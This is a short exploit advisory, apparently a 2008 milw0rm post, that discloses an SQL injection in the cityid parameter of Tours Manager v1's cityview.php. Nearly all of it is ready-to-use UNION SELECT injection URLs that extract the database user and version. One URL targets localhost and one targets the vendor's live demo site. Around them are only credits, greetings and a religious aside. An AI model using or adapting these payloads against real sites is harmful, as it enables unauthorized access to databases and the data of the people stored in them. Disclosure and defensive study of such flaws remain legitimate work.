-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= IN THE NAME OF ALLAH -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Tours Manager v1 (cityview.php cityid) SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [~] Script: Tours Manager v1 [~] Language : PHP [~] Website: http://www.toursmanager.com [~] Type : Commercial [~] Report-Date : 04/11/2008 --[ Founder ]-- G4N0K --[ Exploit ]-- [+] http://localhost/[path]/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5-- --[ L!ve ]-- [+] http://www.toursmanager.com/demo/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5-- --[ Greetz ]-- [~] ALLAH [~] Tornado2800 [~] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH, forgimme... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= exit(); //EoX -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # milw0rm.com [2008-11-04]